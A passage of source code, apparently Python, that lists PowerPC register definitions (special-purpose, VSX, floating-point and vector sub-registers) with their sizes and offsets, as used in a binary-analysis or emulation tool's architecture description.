Register('spr3e4', 4, 0x1f90),
Register('spr3e5', 4, 0x1f94),
Register('spr3e6', 4, 0x1f98),
Register('spr3e7', 4, 0x1f9c),
Register('spr3e8', 4, 0x1fa0),
Register('spr3e9', 4, 0x1fa4),
Register('spr3ea', 4, 0x1fa8),
Register('spr3eb', 4, 0x1fac),
Register('spr3ec', 4, 0x1fb0),
Register('spr3ed', 4, 0x1fb4),
Register('spr3ee', 4, 0x1fb8),
Register('spr3ef', 4, 0x1fbc),
Register('spr3f0', 4, 0x1fc0),
Register('spr3f1', 4, 0x1fc4),
Register('spr3f2', 4, 0x1fc8),
Register('spr3f3', 4, 0x1fcc),
Register('spr3f4', 4, 0x1fd0),
Register('spr3f5', 4, 0x1fd4),
Register('spr3f6', 4, 0x1fd8),
Register('spr3f7', 4, 0x1fdc),
Register('spr3f8', 4, 0x1fe0),
Register('spr3f9', 4, 0x1fe4),
Register('spr3fa', 4, 0x1fe8),
Register('spr3fb', 4, 0x1fec),
Register('spr3fc', 4, 0x1ff0),
Register('spr3fd', 4, 0x1ff4),
Register('spr3fe', 4, 0x1ff8),
Register('spr3ff', 4, 0x1ffc),
Register('vs0', 16, 0x4000),
Register('f0', 8, 0x4008),
Register('vs1', 16, 0x4010),
Register('f1', 8, 0x4018),
Register('vs2', 16, 0x4020),
Register('f2', 8, 0x4028),
Register('vs3', 16, 0x4030),
Register('f3', 8, 0x4038),
Register('vs4', 16, 0x4040),
Register('f4', 8, 0x4048),
Register('vs5', 16, 0x4050),
Register('f5', 8, 0x4058),
Register('vs6', 16, 0x4060),
Register('f6', 8, 0x4068),
Register('vs7', 16, 0x4070),
Register('f7', 8, 0x4078),
Register('vs8', 16, 0x4080),
Register('f8', 8, 0x4088),
Register('vs9', 16, 0x4090),
Register('f9', 8, 0x4098),
Register('vs10', 16, 0x40a0),
Register('f10', 8, 0x40a8),
Register('vs11', 16, 0x40b0),
Register('f11', 8, 0x40b8),
Register('vs12', 16, 0x40c0),
Register('f12', 8, 0x40c8),
Register('vs13', 16, 0x40d0),
Register('f13', 8, 0x40d8),
Register('vs14', 16, 0x40e0),
Register('f14', 8, 0x40e8),
Register('vs15', 16, 0x40f0),
Register('f15', 8, 0x40f8),
Register('vs16', 16, 0x4100),
Register('f16', 8, 0x4108),
Register('vs17', 16, 0x4110),
Register('f17', 8, 0x4118),
Register('vs18', 16, 0x4120),
Register('f18', 8, 0x4128),
Register('vs19', 16, 0x4130),
Register('f19', 8, 0x4138),
Register('vs20', 16, 0x4140),
Register('f20', 8, 0x4148),
Register('vs21', 16, 0x4150),
Register('f21', 8, 0x4158),
Register('vs22', 16, 0x4160),
Register('f22', 8, 0x4168),
Register('vs23', 16, 0x4170),
Register('f23', 8, 0x4178),
Register('vs24', 16, 0x4180),
Register('f24', 8, 0x4188),
Register('vs25', 16, 0x4190),
Register('f25', 8, 0x4198),
Register('vs26', 16, 0x41a0),
Register('f26', 8, 0x41a8),
Register('vs27', 16, 0x41b0),
Register('f27', 8, 0x41b8),
Register('vs28', 16, 0x41c0),
Register('f28', 8, 0x41c8),
Register('vs29', 16, 0x41d0),
Register('f29', 8, 0x41d8),
Register('vs30', 16, 0x41e0),
Register('f30', 8, 0x41e8),
Register('vs31', 16, 0x41f0),
Register('f31', 8, 0x41f8),
Register('vs32', 16, 0x4200),
Register('vr0_64_1', 8, 0x4200),
Register('vr0_32_3', 4, 0x4200),
Register('vr0_16_7', 2, 0x4200),
Register('vr0_8_15', 1, 0x4200),
Register('vr0_8_14', 1, 0x4201),
Register('vr0_16_6', 2, 0x4202),
Register('vr0_8_13', 1, 0x4202),
Register('vr0_8_12', 1, 0x4203),
Register('vr0_32_2', 4, 0x4204),
Register('vr0_16_5', 2, 0x4204),
Register('vr0_8_11', 1, 0x4204),
Register('vr0_8_10', 1, 0x4205),
Register('vr0_16_4', 2, 0x4206),
Register('vr0_8_9', 1, 0x4206),
Register('vr0_8_8', 1, 0x4207),
Register('vr0_64_0', 8, 0x4208),
Register('vr0_32_1', 4, 0x4208),
Register('vr0_16_3', 2, 0x4208),
Register('vr0_8_7', 1, 0x4208),
Register('vr0_8_6', 1, 0x4209),
Register('vr0_16_2', 2, 0x420a),
Register('vr0_8_5', 1, 0x420a),
Register('vr0_8_4', 1, 0x420b),
Register('vr0_32_0', 4, 0x420c),
Register('vr0_16_1', 2, 0x420c),
Register('vr0_8_3', 1, 0x420c),
Register('vr0_8_2', 1, 0x420d),
Register('vr0_16_0', 2, 0x420e),
Register('vr0_8_1', 1, 0x420e),
Register('vr0_8_0', 1, 0x420f),
Register('vs33', 16, 0x4210),
Register('vr1_64_1', 8, 0x4210),
Register('vr1_32_3', 4, 0x4210),
Register('vr1_16_7', 2, 0x4210),
Register('vr1_8_15', 1, 0x4210),
Register('vr1_8_14', 1, 0x4211),
Register('vr1_16_6', 2, 0x4212),
Register('vr1_8_13', 1, 0x4212),
Register('vr1_8_12', 1, 0x4213),
Register('vr1_32_2', 4, 0x4214),
Register('vr1_16_5', 2, 0x4214),
Register('vr1_8_11', 1, 0x4214),
Register('vr1_8_10', 1, 0x4215),
Register('vr1_16_4', 2, 0x4216),
Register('vr1_8_9', 1, 0x4216),
Register('vr1_8_8', 1, 0x4217),
Register('vr1_64_0', 8, 0x4218),
Register('vr1_32_1', 4, 0x4218),
Register('vr1_16_3', 2, 0x4218),
Register('vr1_8_7', 1, 0x4218),
Register('vr1_8_6', 1, 0x4219),
Register('vr1_16_2', 2, 0x421a),
Register('vr1_8_5', 1, 0x421a),
Register('vr1_8_4', 1, 0x421b),
Register('vr1_32_0', 4, 0x421c),
Register('vr1_16_1', 2, 0x421c),
Register('vr1_8_3', 1, 0x421c),
Register('vr1_8_2', 1, 0x421d),
Register('vr1_16_0', 2, 0x421e),
Register('vr1_8_1', 1, 0x421e),
Register('vr1_8_0', 1, 0x421f),
Register('vs34', 16, 0x4220),
Register('vr2_64_1', 8, 0x4220),
Register('vr2_32_3', 4, 0x4220),
Register('vr2_16_7', 2, 0x4220),
Register('vr2_8_15', 1, 0x4220),
Register('vr2_8_14', 1, 0x4221),
Register('vr2_16_6', 2, 0x4222),
Register('vr2_8_13', 1, 0x4222),
Register('vr2_8_12', 1, 0x4223),
Register('vr2_32_2', 4, 0x4224),
Register('vr2_16_5', 2, 0x4224),
Register('vr2_8_11', 1, 0x4224),
Register('vr2_8_10', 1, 0x4225),
Register('vr2_16_4', 2, 0x4226),
Register('vr2_8_9', 1, 0x4226),
Register('vr2_8_8', 1, 0x4227),
Register('vr2_64_0', 8, 0x4228),
Register('vr2_32_1', 4, 0x4228),
Register('vr2_16_3', 2, 0x4228),
Register('vr2_8_7', 1, 0x4228),
Register('vr2_8_6', 1, 0x4229),
Register('vr2_16_2', 2, 0x422a),
Register('vr2_8_5', 1, 0x422a),
Register('vr2_8_4', 1, 0x422b),
Register('vr2_32_0', 4, 0x422c),
Register('vr2_16_1', 2, 0x422c),
Register('vr2_8_3', 1, 0x422c),
Register('vr2_8_2', 1, 0x422d),
Register('vr2_16_0', 2, 0x422e),
Register('vr2_8_1', 1, 0x422e),
Register('vr2_8_0', 1, 0x422f),
Register('vs35', 16, 0x4230),
Register('vr3_64_1', 8, 0x4230),
Register('vr3_32_3', 4, 0x4230),
Register('vr3_16_7', 2, 0x4230),
Register('vr3_8_15', 1, 0x4230),
Register('vr3_8_14', 1, 0x4231),
Register('vr3_16_6', 2, 0x4232),
Register('vr3_8_13', 1, 0x4232),
Register('vr3_8_12', 1, 0x4233),
Register('vr3_32_2', 4, 0x4234),
Register('vr3_16_5', 2, 0x4234),
Register('vr3_8_11', 1, 0x4234),
Register('vr3_8_10', 1, 0x4235),
Register('vr3_16_4', 2, 0x4236),
Register('vr3_8_9', 1, 0x4236),
Register('vr3_8_8', 1, 0x4237),
Register('vr3_64_0', 8, 0x4238),
Register('vr3_32_1', 4, 0x4238),
Register('vr3_16_3', 2, 0x4238),
Register('vr3_8_7', 1, 0x4238),
Register('vr3_8_6', 1, 0x4239),
Register('vr3_16_2', 2, 0x423a),
Register('vr3_8_5', 1, 0x423a),
Register('vr3_8_4', 1, 0x423b),
Register('vr3_32_0', 4, 0x423c),
Register('vr3_16_1', 2, 0x423c),
Register('vr3_8_3', 1, 0x423c),
Register('vr3_8_2', 1, 0x423d),
Register('vr3_16_0', 2, 0x423e),
Register('vr3_8_1', 1, 0x423e),
Register('vr3_8_0', 1, 0x423f),
Register('vs36', 16, 0x4240),
Register('vr4_64_1', 8, 0x4240),
Register('vr4_32_3', 4, 0x4240),
Register('vr4_16_7', 2, 0x4240),
Register('vr4_8_15', 1, 0x4240),
Register('vr4_8_14', 1, 0x4241),
Register('vr4_16_6', 2, 0x4242),
Register('vr4_8_13', 1, 0x4242),
Register('vr4_8_12', 1, 0x4243),
Register('vr4_32_2', 4, 0x4244),
Register('vr4_16_5', 2, 0x4244),
Register('vr4_8_11', 1, 0x4244),
Register('vr4_8_10', 1, 0x4245),
Register('vr4_16_4', 2, 0x4246),
Register('vr4_8_9', 1, 0x4246),
Register('vr4_8_8', 1, 0x4247),
Register('vr4_64_0', 8, 0x4248),
Register('vr4_32_1', 4, 0x4248),
Register('vr4_16_3', 2, 0x4248),
Register('vr4_8_7', 1, 0x4248),
Register('vr4_8_6', 1, 0x4249),
Register('vr4_16_2', 2, 0x424a),
Register('vr4_8_5', 1, 0x424a),
Register('vr4_8_4', 1, 0x424b),
Register('vr4_32_0', 4, 0x424c),
Register('vr4_16_1', 2, 0x424c),
Register('vr4_8_3', 1, 0x424c),
Register('vr4_8_2', 1, 0x424d),
Register('vr4_16_0', 2, 0x424e),
Register('vr4_8_1', 1, 0x424e),
Register('vr4_8_0', 1, 0x424f),
Register('vs37', 16, 0x4250),
Register('vr5_64_1', 8, 0x4250),
Register('vr5_32_3', 4, 0x4250),
Register('vr5_16_7', 2, 0x4250),
Register('vr5_8_15', 1, 0x4250),
Register('vr5_8_14', 1, 0x4251),
Register('vr5_16_6', 2, 0x4252),
Register('vr5_8_13', 1, 0x4252),
Register('vr5_8_12', 1, 0x4253),
Register('vr5_32_2', 4, 0x4254),
Register('vr5_16_5', 2, 0x4254),
Register('vr5_8_11', 1, 0x4254),
Register('vr5_8_10', 1, 0x4255),
Register('vr5_16_4', 2, 0x4256),
Register('vr5_8_9', 1, 0x4256),
Register('vr5_8_8', 1, 0x4257),
Register('vr5_64_0', 8, 0x4258),
Register('vr5_32_1', 4, 0x4258),
Register('vr5_16_3', 2, 0x4258),
Register('vr5_8_7', 1, 0x4258),
Register('vr5_8_6', 1, 0x4259),
Register('vr5_16_2', 2, 0x425a),
Register('vr5_8_5', 1, 0x425a),
Register('vr5_8_4', 1, 0x425b),
Register('vr5_32_0', 4, 0x425c),
Register('vr5_16_1', 2, 0x425c),
Register('vr5_8_3', 1, 0x425c),
Register('vr5_8_2', 1, 0x425d),
Register('vr5_16_0', 2, 0x425e),
Register('vr5_8_1', 1, 0x425e),
Register('vr5_8_0', 1, 0x425f),
Register('vs38', 16, 0x4260),
Register('vr6_64_1', 8, 0x4260),
Register('vr6_32_3', 4, 0x4260),
Register('vr6_16_7', 2, 0x4260),
Register('vr6_8_15', 1, 0x4260),
Register('vr6_8_14', 1, 0x4261),
Register('vr6_16_6', 2, 0x4262),
Register('vr6_8_13', 1, 0x4262),
Register('vr6_8_12', 1, 0x4263),
Register('vr6_32_2', 4, 0x4264),
Register('vr6_16_5', 2, 0x4264),
Register('vr6_8_11', 1, 0x4264),
Register('vr6_8_10', 1, 0x4265),
Register('vr6_16_4', 2, 0x4266),
Register('vr6_8_9', 1, 0x4266),
Register('vr6_8_8', 1, 0x4267),
Register('vr6_64_0', 8, 0x4268),
Register('vr6_32_1', 4, 0x4268),
Register('vr6_16_3', 2, 0x4268),
Register('vr6_8_7', 1, 0x4268),
Register('vr6_8_6', 1, 0x4269),
Register('vr6_16_2', 2, 0x426a),
Register('vr6_8_5', 1, 0x426a),
Register('vr6_8_4', 1, 0x426b),
Register('vr6_32_0', 4, 0x426c),
Register('vr6_16_1', 2, 0x426c),
Register('vr6_8_3', 1, 0x426c),
Register('vr6_8_2', 1, 0x426d),
Register('vr6_16_0', 2, 0x426e),
Register('vr6_8_1', 1, 0x426e),
Register('vr6_8_0', 1, 0x426f),
Register('vs39', 16, 0x4270),
Register('vr7_64_1', 8, 0x4270),
Register('vr7_32_3', 4, 0x4270),
Register('vr7_16_7', 2, 0x4270),
Register('vr7_8_15', 1, 0x4270),
Register('vr7_8_14', 1, 0x4271),
Register('vr7_16_6', 2, 0x4272),
Register('vr7_8_13', 1, 0x4272),
Register('vr7_8_12', 1, 0x4273),
Register('vr7_32_2', 4, 0x4274),
Register('vr7_16_5', 2, 0x4274),
Register('vr7_8_11', 1, 0x4274),
Register('vr7_8_10', 1, 0x4275),
Register('vr7_16_4', 2, 0x4276),
Register('vr7_8_9', 1, 0x4276),
Register('vr7_8_8', 1, 0x4277),
Register('vr7_64_0', 8, 0x4278),
Register('vr7_32_1', 4, 0x4278),
Register('vr7_16_3', 2, 0x4278),
Register('vr7_8_7', 1, 0x4278),
Register('vr7_8_6', 1, 0x4279),
Register('vr7_16_2', 2, 0x427a),
Register('vr7_8_5', 1, 0x427a),
Register('vr7_8_4', 1, 0x427b),
Register('vr7_32_0', 4, 0x427c),
Register('vr7_16_1', 2, 0x427c),
Register('vr7_8_3', 1, 0x427c),
Register('vr7_8_2', 1, 0x427d),
Register('vr7_16_0', 2, 0x427e),
Register('vr7_8_1', 1, 0x427e),
Register('vr7_8_0', 1, 0x427f),
Register('vs40', 16, 0x4280),
Register('vr8_64_1', 8, 0x4280),
Register('vr8_32_3', 4, 0x4280),
Register('vr8_16_7', 2, 0x4280),
Register('vr8_8_15', 1, 0x4280),
Register('vr8_8_14', 1, 0x4281),
Register('vr8_16_6', 2, 0x4282),
Register('vr8_8_13', 1, 0x4282),
Register('vr8_8_12', 1, 0x4283),
Register('vr8_32_2', 4, 0x4284),
Register('vr8_16_5', 2, 0x4284),
Register('vr8_8_11', 1, 0x4284),
Register('vr8_8_10', 1, 0x4285),
Register('vr8_16_4', 2, 0x4286),
Register('vr8_8_9', 1, 0x4286),
Register('vr8_8_8', 1, 0x4287),
Register('vr8_64_0', 8, 0x4288),
Register('vr8_32_1', 4, 0x4288),
Register('vr8_16_3', 2, 0x4288),
Register('vr8_8_7', 1, 0x4288),
Register('vr8_8_6', 1, 0x4289),
Register('vr8_16_2', 2, 0x428a),
Register('vr8_8_5', 1, 0x428a),
Register('vr8_8_4', 1, 0x428b),
Register('vr8_32_0', 4, 0x428c),
Register('vr8_16_1', 2, 0x428c),
Register('vr8_8_3', 1, 0x428c),
Register('vr8_8_2', 1, 0x428d),
Register('vr8_16_0', 2, 0x428e),
Register('vr8_8_1', 1, 0x428e),
Register('vr8_8_0', 1, 0x428f),
Register('vs41', 16, 0x4290),
Register('vr9_64_1', 8, 0x4290),
Register('vr9_32_3', 4, 0x4290),
Register('vr9_16_7', 2, 0x4290),
Register('vr9_8_15', 1, 0x4290),
Register('vr9_8_14', 1, 0x4291),
Register('vr9_16_6', 2, 0x4292),
Register('vr9_8_13', 1, 0x4292),
Register('vr9_8_12', 1, 0x4293),
Register('vr9_32_2', 4, 0x4294),
Register('vr9_16_5', 2, 0x4294),
Register('vr9_8_11', 1, 0x4294),
Register('vr9_8_10', 1, 0x4295),
Register('vr9_16_4', 2, 0x4296),
Register('vr9_8_9', 1, 0x4296),
Register('vr9_8_8', 1, 0x4297),
Register('vr9_64_0', 8, 0x4298),
Register('vr9_32_1', 4, 0x4298),
Register('vr9_16_3', 2, 0x4298),
Register('vr9_8_7', 1, 0x4298),
Register('vr9_8_6', 1, 0x4299),
Register('vr9_16_2', 2, 0x429a),
Register('vr9_8_5', 1, 0x429a),
Register('vr9_8_4', 1, 0x429b),
Register('vr9_32_0', 4, 0x429c),
Register('vr9_16_1', 2, 0x429c),
Register('vr9_8_3', 1, 0x429c),
Register('vr9_8_2', 1, 0x429d),
Register('vr9_16_0', 2, 0x429e),
Register('vr9_8_1', 1, 0x429e),
Register('vr9_8_0', 1, 0x429f),
Register('vs42', 16, 0x42a0),
Register('vr10_64_1', 8, 0x42a0),
Register('vr10_32_3', 4, 0x42a0),
Register('vr10_16_7', 2, 0x42a0),
Register('vr10_8_15', 1, 0x42a0),
Register('vr10_8_14', 1, 0x42a1),
Register('vr10_16_6', 2, 0x42a2),
Register('vr10_8_13', 1, 0x42a2),
Register('vr10_8_12', 1, 0x42a3),
Register('vr10_32_2', 4, 0x42a4),
Register('vr10_16_5', 2, 0x42a4),
Register('vr10_8_11', 1, 0x42a4),
Register('vr10_8_10', 1, 0x42a5),
Register('vr10_16_4', 2, 0x42a6),
Register('vr10_8_9', 1, 0x42a6),
Register('vr10_8_8', 1, 0x42a7),
Register('vr10_64_0', 8, 0x42a8),
Register('vr10_32_1', 4, 0x42a8),
Register('vr10_16_3', 2, 0x42a8),
Register('vr10_8_7', 1, 0x42a8),
Register('vr10_8_6', 1, 0x42a9),
Register('vr10_16_2', 2, 0x42aa),
Register('vr10_8_5', 1, 0x42aa),
Register('vr10_8_4', 1, 0x42ab),
Register('vr10_32_0', 4, 0x42ac),
Register('vr10_16_1', 2, 0x42ac),
Register('vr10_8_3', 1, 0x42ac),
Register('vr10_8_2', 1, 0x42ad),
Register('vr10_16_0', 2, 0x42ae),
Register('vr10_8_1', 1, 0x42ae),
Register('vr10_8_0', 1, 0x42af),
Register('vs43', 16, 0x42b0),
Register('vr11_64_1', 8, 0x42b0),
Register('vr11_32_3', 4, 0x42b0),
Register('vr11_16_7', 2, 0x42b0),
Register('vr11_8_15', 1, 0x42b0),
Register('vr11_8_14', 1, 0x42b1),
Register('vr11_16_6', 2, 0x42b2),
Register('vr11_8_13', 1, 0x42b2),
Register('vr11_8_12', 1, 0x42b3),
Register('vr11_32_2', 4, 0x42b4),
Register('vr11_16_5', 2, 0x42b4),
Register('vr11_8_11', 1, 0x42b4),
Register('vr11_8_10', 1, 0x42b5),
Register('vr11_16_4', 2, 0x42b6),
Register('vr11_8_9', 1, 0x42b6),
Register('vr11_8_8', 1, 0x42b7),
Register('vr11_64_0', 8, 0x42b8),
Register('vr11_32_1', 4, 0x42b8),
Register('vr11_16_3', 2, 0x42b8),
Register('vr11_8_7', 1, 0x42b8),
Register('vr11_8_6', 1, 0x42b9),
Register('vr11_16_2', 2, 0x42ba),
Register('vr11_8_5', 1, 0x42ba),
Register('vr11_8_4', 1, 0x42bb),
Register('vr11_32_0', 4, 0x42bc),
Register('vr11_16_1', 2, 0x42bc),
Register('vr11_8_3', 1, 0x42bc),
Register('vr11_8_2', 1, 0x42bd),
Register('vr11_16_0', 2, 0x42be),
Register('vr11_8_1', 1, 0x42be),
Register('vr11_8_0', 1, 0x42bf),
Register('vs44', 16, 0x42c0),
Register('vr12_64_1', 8, 0x42c0),
Register('vr12_32_3', 4, 0x42c0),
Register('vr12_16_7', 2, 0x42c0),
Register('vr12_8_15', 1, 0x42c0),
Register('vr12_8_14', 1, 0x42c1),
Register('vr12_16_6', 2, 0x42c2),
Register('vr12_8_13', 1, 0x42c2),
Register('vr12_8_12', 1, 0x42c3),
Register('vr12_32_2', 4, 0x42c4),
Register('vr12_16_5', 2, 0x42c4),
Register('vr12_8_11', 1, 0x42c4),
Register('vr12_8_10', 1, 0x42c5),
Register('vr12_16_4', 2, 0x42c6),
Register('vr12_8_9', 1, 0x42c6),
Register('vr12_8_8', 1, 0x42c7),
Register('vr12_64_0', 8, 0x42c8),
Register('vr12_32_1', 4, 0x42c8),
Register('vr12_16_3', 2, 0x42c8),
Register('vr12_8_7', 1, 0x42c8),
Register('vr12_8_6', 1, 0x42c9),
Register('vr12_16_2', 2, 0x42ca),
Register('vr12_8_5', 1, 0x42ca),
Register('vr12_8_4', 1, 0x42cb),
Register('vr12_32_0', 4, 0x42cc),
Register('vr12_16_1', 2, 0x42cc),
Register('vr12_8_3', 1, 0x42cc),
Register('vr12_8_2', 1, 0x42cd),
Register('vr12_16_0', 2, 0x42ce),
Register('vr12_8_1', 1, 0x42ce),
Register('vr12_8_0', 1, 0x42cf),
Register('vs45', 16, 0x42d0),
Register('vr13_64_1', 8, 0x42d0),
Register('vr13_32_3', 4, 0x42d0),
Register('vr13_16_7', 2, 0x42d0),
Register('vr13_8_15', 1, 0x42d0),
Register('vr13_8_14', 1, 0x42d1),
Register('vr13_16_6', 2, 0x42d2),
Register('vr13_8_13', 1, 0x42d2),
Register('vr13_8_12', 1, 0x42d3),
Register('vr13_32_2', 4, 0x42d4),
Register('vr13_16_5', 2, 0x42d4),
Register('vr13_8_11', 1, 0x42d4),
Register('vr13_8_10', 1, 0x42d5),
Register('vr13_16_4', 2, 0x42d6),
Register('vr13_8_9', 1, 0x42d6),
Register('vr13_8_8', 1, 0x42d7),
Register('vr13_64_0', 8, 0x42d8),
Register('vr13_32_1', 4, 0x42d8),
Register('vr13_16_3', 2, 0x42d8),
Register('vr13_8_7', 1, 0x42d8),
Register('vr13_8_6', 1, 0x42d9),
Register('vr13_16_2', 2, 0x42da),
Register('vr13_8_5', 1, 0x42da),
Register('vr13_8_4', 1, 0x42db),
Register('vr13_32_0', 4, 0x42dc),
Register('vr13_16_1', 2, 0x42dc),
Register('vr13_8_3', 1, 0x42dc),
Register('vr13_8_2', 1, 0x42dd),
Register('vr13_16_0', 2, 0x42de),
Register('vr13_8_1', 1, 0x42de),
Register('vr13_8_0', 1, 0x42df),
Register('vs46', 16, 0x42e0),
Register('vr14_64_1', 8, 0x42e0),
Register('vr14_32_3', 4, 0x42e0),
Register('vr14_16_7', 2, 0x42e0),
Register('vr14_8_15', 1, 0x42e0),
Register('vr14_8_14', 1, 0x42e1),
Register('vr14_16_6', 2, 0x42e2),
Register('vr14_8_13', 1, 0x42e2),
Register('vr14_8_12', 1, 0x42e3),
Register('vr14_32_2', 4, 0x42e4),
Register('vr14_16_5', 2, 0x42e4),
Register('vr14_8_11', 1, 0x42e4),
Register('vr14_8_10', 1, 0x42e5),
Register('vr14_16_4', 2, 0x42e6),
Register('vr14_8_9', 1, 0x42e6),
Register('vr14_8_8', 1, 0x42e7),
Register('vr14_64_0', 8, 0x42e8),
Register('vr14_32_1', 4, 0x42e8),
Register('vr14_16_3', 2, 0x42e8),
Register('vr14_8_7', 1, 0x42e8),
Register('vr14_8_6', 1, 0x42e9),
Register('vr14_16_2', 2, 0x42ea),
Register('vr14_8_5', 1, 0x42ea),
Register('vr14_8_4', 1, 0x42eb),
Register('vr14_32_0', 4, 0x42ec),
Register('vr14_16_1', 2, 0x42ec),
Register('vr14_8_3', 1, 0x42ec),
Register('vr14_8_2', 1, 0x42ed),
Register('vr14_16_0', 2, 0x42ee),
Register('vr14_8_1', 1, 0x42ee),
Register('vr14_8_0', 1, 0x42ef),
Register('vs47', 16, 0x42f0),
Register('vr15_64_1', 8, 0x42f0),
Register('vr15_32_3', 4, 0x42f0),
Register('vr15_16_7', 2, 0x42f0),
Register('vr15_8_15', 1, 0x42f0),
Register('vr15_8_14', 1, 0x42f1),
Register('vr15_16_6', 2, 0x42f2),
Register('vr15_8_13', 1, 0x42f2),
Register('vr15_8_12', 1, 0x42f3),
Register('vr15_32_2', 4, 0x42f4),
Register('vr15_16_5', 2, 0x42f4),
Register('vr15_8_11', 1, 0x42f4),
Register('vr15_8_10', 1, 0x42f5),
Register('vr15_16_4', 2, 0x42f6),
Register('vr15_8_9', 1, 0x42f6),
Register('vr15_8_8', 1, 0x42f7),
Register('vr15_64_0', 8, 0x42f8),
Register('vr15_32_1', 4, 0x42f8),
Register('vr15_16_3', 2, 0x42f8),
Register('vr15_8_7', 1, 0x42f8),
Register('vr15_8_6', 1, 0x42f9),
Register('vr15_16_2', 2, 0x42fa),
Register('vr15_8_5', 1, 0x42fa),
Register('vr15_8_4', 1, 0x42fb),
Register('vr15_32_0', 4, 0x42fc),
Register('vr15_16_1', 2, 0x42fc),
Register('vr15_8_3', 1, 0x42fc),
Register('vr15_8_2', 1, 0x42fd),
Register('vr15_16_0', 2, 0x42fe),
Register('vr15_8_1', 1, 0x42fe),
Register('vr15_8_0', 1, 0x42ff),
Register('vs48', 16, 0x4300),
Register('vr16_64_1', 8, 0x4300),
Register('vr16_32_3', 4, 0x4300),
Register('vr16_16_7', 2, 0x4300),
Register('vr16_8_15', 1, 0x4300),
Register('vr16_8_14', 1, 0x4301),
Register('vr16_16_6', 2, 0x4302),
Register('vr16_8_13', 1, 0x4302),
Register('vr16_8_12', 1, 0x4303),
Register('vr16_32_2', 4, 0x4304),
Register('vr16_16_5', 2, 0x4304),
Register('vr16_8_11', 1, 0x4304),
Register('vr16_8_10', 1, 0x4305),
Register('vr16_16_4', 2, 0x4306),
Register('vr16_8_9', 1, 0x4306),
Register('vr16_8_8', 1, 0x4307),
Register('vr16_64_0', 8, 0x4308),
Register('vr16_32_1', 4, 0x4308),
Register('vr16_16_3', 2, 0x4308),
Register('vr16_8_7', 1, 0x4308),
Register('vr16_8_6', 1, 0x4309),
Register('vr16_16_2', 2, 0x430a),
Register('vr16_8_5', 1, 0x430a),
Register('vr16_8_4', 1, 0x430b),
Register('vr16_32_0', 4, 0x430c),
Register('vr16_16_1', 2, 0x430c),
Register('vr16_8_3', 1, 0x430c),
Register('vr16_8_2', 1, 0x430d),
Register('vr16_16_0', 2, 0x430e),
Register('vr16_8_1', 1, 0x430e),
Register('vr16_8_0', 1, 0x430f),
Register('vs49', 16, 0x4310),
Register('vr17_64_1', 8, 0x4310),
Register('vr17_32_3', 4, 0x4310),
Register('vr17_16_7', 2, 0x4310),
Register('vr17_8_15', 1, 0x4310),
Register('vr17_8_14', 1, 0x4311),
Register('vr17_16_6', 2, 0x4312),
Register('vr17_8_13', 1, 0x4312),
Register('vr17_8_12', 1, 0x4313),
Register('vr17_32_2', 4, 0x4314),
Register('vr17_16_5', 2, 0x4314),
Register('vr17_8_11', 1, 0x4314),
Register('vr17_8_10', 1, 0x4315),
Register('vr17_16_4', 2, 0x4316),
Register('vr17_8_9', 1, 0x4316),
Register('vr17_8_8', 1, 0x4317),
Register('vr17_64_0', 8, 0x4318),
Register('vr17_32_1', 4, 0x4318),
Register('vr17_16_3', 2, 0x4318),
Register('vr17_8_7', 1, 0x4318),
Register('vr17_8_6', 1, 0x4319),
Register('vr17_16_2', 2, 0x431a),
Register('vr17_8_5', 1, 0x431a),
Register('vr17_8_4', 1, 0x431b),
Register('vr17_32_0', 4, 0x431c),
Register('vr17_16_1', 2, 0x431c),
Register('vr17_8_3', 1, 0x431c),
Register('vr17_8_2', 1, 0x431d),
Register('vr17_16_0', 2, 0x431e),
Register('vr17_8_1', 1, 0x431e),
Register('vr17_8_0', 1, 0x431f),
Register('vs50', 16, 0x4320),
Register('vr18_64_1', 8, 0x4320),
Register('vr18_32_3', 4, 0x4320),
Register('vr18_16_7', 2, 0x4320),
Register('vr18_8_15', 1, 0x4320),
Register('vr18_8_14', 1, 0x4321),
Register('vr18_16_6', 2, 0x4322),
Register('vr18_8_13', 1, 0x4322),
Register('vr18_8_12', 1, 0x4323),
Register('vr18_32_2', 4, 0x4324),
Register('vr18_16_5', 2, 0x4324),
Register('vr18_8_11', 1, 0x4324),
Register('vr18_8_10', 1, 0x4325),
Register('vr18_16_4', 2, 0x4326),
Register('vr18_8_9', 1, 0x4326),
Register('vr18_8_8', 1, 0x4327),
Register('vr18_64_0', 8, 0x4328),
Register('vr18_32_1', 4, 0x4328),
Register('vr18_16_3', 2, 0x4328),
Register('vr18_8_7', 1, 0x4328),
Register('vr18_8_6', 1, 0x4329),
Register('vr18_16_2', 2, 0x432a),
Register('vr18_8_5', 1, 0x432a),
Register('vr18_8_4', 1, 0x432b),
Register('vr18_32_0', 4, 0x432c),
Register('vr18_16_1', 2, 0x432c),
Register('vr18_8_3', 1, 0x432c),
Register('vr18_8_2', 1, 0x432d),
Register('vr18_16_0', 2, 0x432e),
Register('vr18_8_1', 1, 0x432e),
Register('vr18_8_0', 1, 0x432f),
Register('vs51', 16, 0x4330),
Register('vr19_64_1', 8, 0x4330),
Register('vr19_32_3', 4, 0x4330),
Register('vr19_16_7', 2, 0x4330),
Register('vr19_8_15', 1, 0x4330),
Register('vr19_8_14', 1, 0x4331),
Register('vr19_16_6', 2, 0x4332),
Register('vr19_8_13', 1, 0x4332),
Register('vr19_8_12', 1, 0x4333),
Register('vr19_32_2', 4, 0x4334),
Register('vr19_16_5', 2, 0x4334),
Register('vr19_8_11', 1, 0x4334),
Register('vr19_8_10', 1, 0x4335),
Register('vr19_16_4', 2, 0x4336),
Register('vr19_8_9', 1, 0x4336),
Register('vr19_8_8', 1, 0x4337),
Register('vr19_64_0', 8, 0x4338),
Register('vr19_32_1', 4, 0x4338),
Register('vr19_16_3', 2, 0x4338),
Register('vr19_8_7', 1, 0x4338),
Register('vr19_8_6', 1, 0x4339),
Register('vr19_16_2', 2, 0x433a),
Register('vr19_8_5', 1, 0x433a),
Register('vr19_8_4', 1, 0x433b),
Register('vr19_32_0', 4, 0x433c),
Register('vr19_16_1', 2, 0x433c),
Register('vr19_8_3', 1, 0x433c),
Register('vr19_8_2', 1, 0x433d),
Register('vr19_16_0', 2, 0x433e),
Register('vr19_8_1', 1, 0x433e),
Register('vr19_8_0', 1, 0x433f),
Register('vs52', 16, 0x4340),
Register('vr20_64_1', 8, 0x4340),
Register('vr20_32_3', 4, 0x4340),
Register('vr20_16_7', 2, 0x4340),
Register('vr20_8_15', 1, 0x4340),
Register('vr20_8_14', 1, 0x4341),
Register('vr20_16_6', 2, 0x4342),
Register('vr20_8_13', 1, 0x4342),
Register('vr20_8_12', 1, 0x4343),
Register('vr20_32_2', 4, 0x4344),
